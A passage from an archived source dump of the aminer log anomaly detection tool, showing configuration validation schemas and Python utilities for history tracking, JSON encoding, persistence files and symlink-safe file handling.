'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS']}, 'gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'sim_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'indicator_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'num_update_unq': {'type': 'integer', 'min': 1}, 'num_s_gof_values': {'type': 'integer', 'min': 1}, 'num_s_gof_bt': {'type': 'integer', 'min': 1}, 'num_d_bt': {'type': 'integer', 'min': 1}, 'num_pause_discrete': {'type': 'integer', 'min': 0}, 'num_pause_others': {'type': 'integer', 'min': 0}, 'test_gof_int': {'type': 'boolean'}, 'num_stop_update': {'type': 'boolean'}, 'silence_output_without_confidence': {'type': 'boolean'}, 'silence_output_except_indicator': {'type': 'boolean'}, 'num_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_update_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_var_type_considered_ind': {'type': 'integer', 'min': 1}, 'num_stat_stop_update': {'type': 'integer', 'min': 1}, 'num_updates_until_var_reduction': {'type': 'integer', 'min': 0}, 'var_reduction_thres': {'type': 'float'}, 'num_skipped_ind_for_weights': {'type': 'integer', 'min': 0}, 'num_ind_for_weights': {'type': 'integer', 'min': 1}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi']}, 'use_empiric_distr': {'type': 'boolean'}, 'range_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax']}, 'range_threshold': {'type': 'float', 'min': 0.000001}, 'range_limits_factor': {'type': 'float', 'min': 0.000001}, 'num_reinit_range': {'type': 'integer', 'min': 0}, 'dw_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'save_statistics': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathValueTimeIntervalDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'time_period_length': {'type': 'integer', 'min': 1}, 'max_time_diff': {'type': 'integer', 'min': 1}, 'num_reduce_time_list': {'type': 'integer', 'min': 1}, 'allow_missing_values': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'num_init': {'type': 'integer', 'min': 1}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TSAArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'waiting_time': {'type': 'integer', 'min': 1}, 'num_sections_waiting_time': {'type': 'integer', 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'acf_pause_interval_percentage': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_auto_pause_interval': {'type': 'boolean'}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1}, 'build_sum_over_values': {'type': 'boolean'}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'num_division_time_step': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'round_time_interval_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'min_log_lines_per_time_step': {'type': 'integer', 'min': 1}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MinimalTransitionTimeDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'min': 1}, 'time_output_threshold': {'type': 'integer', 'min': 0}, 'anomaly_threshold': {'type': 'float', 'min': 0, 'max': 1.0}, 'output_logline': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'], 'required': True}, 'suppress': {'type': 'boolean'} } ] } } } EventHandlerValidationSchema.py000066400000000000000000000071511437606560100407760ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'forbidden': [ 'KafkaEventHandler', 'ZmqEventHandler', 'StreamPrinterEventHandler', 'SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'score': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ZmqEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': False}, 'url': {'type': 'string', 'empty': False}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['KafkaEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': True, 'empty': False}, 'cfgfile': {'type': 'string', 'empty': False}, 'options': {'type': 'dict', 'schema': { 'id': {'type': 'string', 'empty': False}, 'type': {'type': ['string', 'list', 'integer']}}}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StreamPrinterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'output_file_path': {'type': 'string', 'empty': False} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'instance_name': {'type': 'string', 'default': 'aminer', 'empty': False} } ] } } } ParserValidationSchema.py000066400000000000000000000137141437606560100376550ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Parser': { 'required': True, 'type': 'list', 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'empty': False, 'forbidden': [ 'ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', 'DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement', 'JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['ElementValueBranchModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'required': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': {'type': [ 'boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string', 'empty': False}}}, 'required': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalFloatValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalIntegerValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_format': {'type': 'string', 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'text_locale': {'type': 'string', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1}, 'timestamp_scale': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['MultiLocaleDateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True, 'empty': False}, 'maxlength': 3, 'minlength': 3}}}, 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DelimitedDataModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'delimiter': {'type': 'string', 'required': True, 'empty': False}, 'escape': {'type': 'string'}, 'consume_delimiter': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'optional_key_prefix': {'type': 'string'}, 'nullable_key_prefix': {'type': 'string'}, 'allow_all_fields': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'strict': {'type': 'boolean'}, 'ignore_null': {'type': 'boolean'} } ] } } } logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/000077500000000000000000000000001437606560100301645ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/History.py000066400000000000000000000100231437606560100321730ustar00rootroot00000000000000"""This module contains multiple History classes used by the aminer. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import random import abc from aminer.input.InputInterfaces import AtomHandlerInterface def get_log_int(max_bits): """Get a log-distributed random integer integer in range 0 to maxBits-1.""" rand_bits = random.randint(0, (1 << max_bits) - 1) result = 0 while (rand_bits & 1) != 0: result += 1 rand_bits >>= 1 return result class ObjectHistory(metaclass=abc.ABCMeta): """ This is the superinterface of all object histories. The idea behind that is to use that type of history best suited for a purpose considering amount of data, possibility for history size limits to be reached, priorization which elements should be dropped first. """ @abc.abstractmethod def add_object(self, new_object): """Add an object to this history. This method call may evict other objects from the history.""" @abc.abstractmethod def get_history(self): """Get the whole history list. Make sure to clone the list before modification when influences on this object are not intended.""" @abc.abstractmethod def clear_history(self): """Clean the whole history.""" class LogarithmicBackoffHistory(ObjectHistory): """ This class keeps a history list of items with logarithmic storage characteristics. When adding objects, the list will be filled to the maximum size with the newest items at the end. When filled, adding a new element will replace with probability 1/2 the last element. With a chance of 1/4, the last element will be moved to the next lower position, before putting the new element at the end of the list. With a chance of 1/8, the last two elements are moved, ... Thus the list will in average span a time range of 2^maxItems items with growing size of holes towards the earliest element. """ def __init__(self, max_items, initial_list=None): self.max_items = max_items if initial_list is None: initial_list = [] else: initial_list = initial_list[:max_items] self.history = initial_list def add_object(self, new_object): """Add a new object to the list according to the rules described in the class docstring.""" if len(self.history) < self.max_items: self.history.append(new_object) else: move_pos = get_log_int(self.max_items - 1) self.history = self.history[:self.max_items - move_pos - 1] + self.history[self.max_items - move_pos:] + [new_object] def get_history(self): """Get the whole history list. Make sure to clone the list before modification when influences on this object are not intended.""" return self.history def clear_history(self): """Clean the whole history.""" self.history[:] = [] class VolatileLogarithmicBackoffAtomHistory(AtomHandlerInterface, LogarithmicBackoffHistory): """ This class is a volatile filter to keep a history of log atoms. Example usages can be for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """Initialize the history component.""" LogarithmicBackoffHistory.__init__(self, max_items) AtomHandlerInterface.__init__(self) def receive_atom(self, log_atom): """Receive an atom and add it to the history log.""" self.add_object(log_atom) return True logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/JsonUtil.py000066400000000000000000000060131437606560100323050ustar00rootroot00000000000000""" This module converts json strings to object structures also supporting byte array structures. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import logging import ast from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util.StringUtil import encode_byte_string_as_string, decode_string_as_byte_string def dump_as_json(input_object): """Dump an input object encoded as string.""" return json.dumps(encode_object(input_object)) def load_json(input_string): """Load an string encoded as object structure.""" return decode_object(json.loads(input_string)) def encode_object(term): """@param term return an object encoded as string.""" encoded_object = '' if isinstance(term, str): encoded_object = 'string:' + term elif isinstance(term, bytes): encoded_object = 'bytes:' + encode_byte_string_as_string(term) elif isinstance(term, (list, tuple, set)): encoded_object = [encode_object(item) for item in term] elif isinstance(term, dict): encoded_object = {} for key, var in term.items(): if isinstance(key, tuple): key = "tuple:" + str(key) else: key = encode_object(key) var = encode_object(var) encoded_object[key] = var elif isinstance(term, (bool, int, float)) or term is None: encoded_object = term else: msg = f"Unencodeable object {type(term)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return encoded_object def decode_object(term): """@param term return a string decoded as object structure.""" decoded_object = '' if isinstance(term, str) and term.startswith('string:'): decoded_object = term[7:] elif isinstance(term, str) and term.startswith('bytes:'): decoded_object = term[6:] decoded_object = decode_string_as_byte_string(decoded_object) elif isinstance(term, list): decoded_object = [decode_object(item) for item in term] elif isinstance(term, dict): decoded_object = {} for key, var in term.items(): if key.startswith("tuple:"): try: key = ast.literal_eval(key[6:]) except ValueError: pass else: key = decode_object(key) var = decode_object(var) decoded_object[key] = var else: decoded_object = term return decoded_object logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/PersistenceUtil.py000066400000000000000000000145051437606560100336650ustar00rootroot00000000000000""" This module defines functions for reading and writing files in a secure way. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import logging import tempfile import shutil import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util import JsonUtil # Have a registry of all persistable components. Those might be happy to be invoked before python process is terminating. persistable_components: list = [] SKIP_PERSISTENCE_ID_WARNING = False def add_persistable_component(component): """Add a component to the registry of all persistable components.""" for c in persistable_components: if hasattr(c, 'persistence_file_name') and c.persistence_file_name == component.persistence_file_name: msg = f'Detectors of type {c.__class__.__name__} use the persistence_id "{os.path.split(c.persistence_file_name)[1]}" ' \ f'multiple times. Please assign a unique persistence_id for every component.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) if not SKIP_PERSISTENCE_ID_WARNING: print('Warning: ' + msg, file=sys.stderr) persistable_components.append(component) def open_persistence_file(file_name, flags): """ Open the given persistence file. When O_CREAT was specified, the function will attempt to create the directories too. """ if isinstance(file_name, str): file_name = file_name.encode() try: fd = SecureOSFunctions.secure_open_file(file_name, flags) return fd except OSError as openOsError: if ((flags & os.O_CREAT) == 0) or (openOsError.errno != errno.ENOENT): logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError create_missing_directories(file_name) return None def replace_persistence_file(file_name, new_file_handle): """Replace the named file with the file referred by the handle.""" try: os.unlink(file_name, dir_fd=SecureOSFunctions.secure_open_base_directory()) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError tmp_file_name = os.readlink(f"/proc/self/fd/{new_file_handle}") if SecureOSFunctions.base_dir_path.decode() in file_name: file_name = file_name.replace(SecureOSFunctions.base_dir_path.decode(), '').lstrip('/') os.link( tmp_file_name, file_name, src_dir_fd=SecureOSFunctions.tmp_base_dir_fd, dst_dir_fd=SecureOSFunctions.secure_open_base_directory()) os.unlink(tmp_file_name, dir_fd=SecureOSFunctions.tmp_base_dir_fd) def persist_all(): """Persist all persistable components in the registry.""" for component in persistable_components: component.do_persist() def load_json(file_name): """ Load persistence data from file. @return None if file did not yet exist. """ persistence_data = None try: persistence_file_handle = open_persistence_file(file_name, os.O_RDONLY | os.O_NOFOLLOW) persistence_data = os.read(persistence_file_handle, os.fstat(persistence_file_handle).st_size) persistence_data = str(persistence_data, 'utf-8') os.close(persistence_file_handle) except OSError as openOsError: if openOsError.errno != errno.ENOENT: logging.getLogger(DEBUG_LOG_NAME).error(openOsError) raise openOsError return None result = None try: result = JsonUtil.load_json(persistence_data) except ValueError as value_error: msg = f"Corrupted data in {file_name, value_error}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return result def store_json(file_name, object_data): """Store persistence data to file.""" persistence_data = JsonUtil.dump_as_json(object_data) # Create a temporary file within persistence directory to write new persistence data to it. # Thus the old data is not modified, any error creating or writing the file will not harm the old state. fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, bytes(persistence_data, 'utf-8')) create_missing_directories(file_name) replace_persistence_file(file_name, fd) os.close(fd) def create_missing_directories(file_name): """Create missing persistence directories.""" # Find out, which directory is missing by stating our way up. dir_name_length = file_name.rfind('/') if dir_name_length > 0 and not os.path.exists(file_name[:dir_name_length]): os.makedirs(file_name[:dir_name_length]) def clear_persistence(persistence_dir_name): """Delete all persistence data from the persistence_dir.""" for filename in os.listdir(persistence_dir_name): if filename == 'backup': continue file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) def copytree(src, dst, symlinks=False, ignore=None): """Copy a directory recursively. This method has no issue with the destination directory existing (shutil.copytree has).""" for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) SecureOSFunctions.py000066400000000000000000000223611437606560100340440ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util""" This module defines functions for secure file handling. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import socket import struct import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME base_dir_fd = None tmp_base_dir_fd = None log_dir_fd = None base_dir_path = None tmp_base_dir_path = None log_dir_path = None def secure_open_base_directory(directory_name=None, flags=0): """Open the base directory in a secure way.""" global base_dir_fd # skipcq: PYL-W0603 global base_dir_path # skipcq: PYL-W0603 global tmp_base_dir_fd # skipcq: PYL-W0603 global tmp_base_dir_path # skipcq: PYL-W0603 if directory_name is not None and isinstance(directory_name, str): directory_name = directory_name.encode() if base_dir_path is None and (directory_name is None or not directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if base_dir_path is None and (flags & os.O_DIRECTORY) == 0: msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if base_dir_fd is None: base_dir_fd = os.open(directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) base_dir_path = directory_name tmp_base_dir_path = directory_name tmp_base_dir_fd = os.open(tmp_base_dir_path, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) return base_dir_fd def close_base_directory(): """Close the base directory at program shutdown.""" global base_dir_fd # skipcq: PYL-W0603 global tmp_base_dir_fd # skipcq: PYL-W0603 global base_dir_path # skipcq: PYL-W0603 try: if base_dir_fd is not None: os.close(base_dir_fd) base_dir_fd = None base_dir_path = None if tmp_base_dir_fd is not None: os.close(tmp_base_dir_fd) tmp_base_dir_fd = None except OSError as e: msg = f"Could not close the base directory. Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_log_directory(log_directory_name=None, flags=0): """Open the base log directory in a secure way.""" global log_dir_fd # skipcq: PYL-W0603 global log_dir_path # skipcq: PYL-W0603 if log_directory_name is not None and isinstance(log_directory_name, str): log_directory_name = log_directory_name.encode() if log_dir_path is None and (log_directory_name is None or not log_directory_name.startswith(b'/')): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if log_dir_path is None and (flags & os.O_DIRECTORY) == 0: msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if log_dir_fd is None: if base_dir_path is not None and base_dir_path.startswith(os.path.split(log_directory_name)[0]): log_dir_fd = os.open(log_directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY, dir_fd=base_dir_fd) log_dir_path = log_directory_name else: log_dir_fd = os.open(log_directory_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) log_dir_path = log_directory_name return log_dir_fd def close_log_directory(): """Close the base directory at program shutdown.""" global log_dir_fd # skipcq: PYL-W0603 global log_dir_path # skipcq: PYL-W0603 try: if log_dir_fd is not None: os.close(log_dir_fd) log_dir_fd = None log_dir_path = None except OSError as e: msg = f"Could not close the base log directory. Error: {e}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def secure_open_file(file_name, flags): """ Secure opening of a file with given flags. This call will refuse to open files where any path component is a symlink. As operating system does not provide any means to do that, open the file_name directory by directory. It also adds O_NOCTTY to the flags as controlling TTY logics as this is just an additional risk and does not make sense for opening of log files. @param file_name is the file name as byte string """ if isinstance(file_name, str): file_name = file_name.encode() if not file_name.startswith(b'/'): msg = 'Secure open on relative path not supported' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if (file_name.endswith(b'/')) and ((flags & os.O_DIRECTORY) == 0): msg = 'Opening directory but O_DIRECTORY flag missing' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) global base_dir_path # skipcq: PYL-W0603, PYL-W0602 global base_dir_fd # skipcq: PYL-W0603, PYL-W0602 if base_dir_path is not None: if file_name.startswith(base_dir_path): base_name = file_name.replace(base_dir_path, b'').lstrip(b'/') else: base_name = file_name return os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=base_dir_fd) dir_name = os.path.dirname(file_name) base_name = os.path.basename(file_name) dir_fd = os.open(dir_name, flags | os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) ret_fd = os.open(base_name, flags | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=dir_fd) os.close(dir_fd) return ret_fd def send_annotated_file_descriptor(send_socket, send_fd, type_info, annotation_data): """ Send file descriptor and associated annotation data via SCM_RIGHTS. @param type_info has to be a null-byte free string to inform the receiver how to handle the file descriptor and how to interpret the annotationData. @param annotation_data this optional byte array may convey additional information about the file descriptor. """ # Construct the message data first if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() if type_info.find(b'\x00') >= 0: msg = 'Null bytes not supported in typeInfo' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) message_data = b'%s\x00%s' % (type_info, annotation_data) send_socket.sendmsg([message_data], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, struct.pack('i', send_fd))]) def send_logstream_descriptor(send_socket, send_fd, send_file_name): """Send a file descriptor to be used as standard log data stream source for the analysis pipeline.""" send_annotated_file_descriptor(send_socket, send_fd, b'logstream', send_file_name) def receive_annoted_file_descriptor(receive_socket): """ Receive a single file descriptor and attached annotation information via SCM_RIGHTS via the given socket. The method may raise an Exception when invoked on non-blocking sockets and no messages available. @return a tuple containing the received file descriptor, type information (see sendAnnotatedFileDescriptor) and the annotation information. """ message_data, anc_data, _flags, _remote_address = receive_socket.recvmsg(1 << 16, socket.CMSG_LEN(struct.calcsize('i'))) if len(anc_data) != 1: msg = f"Received {len(anc_data)} sets 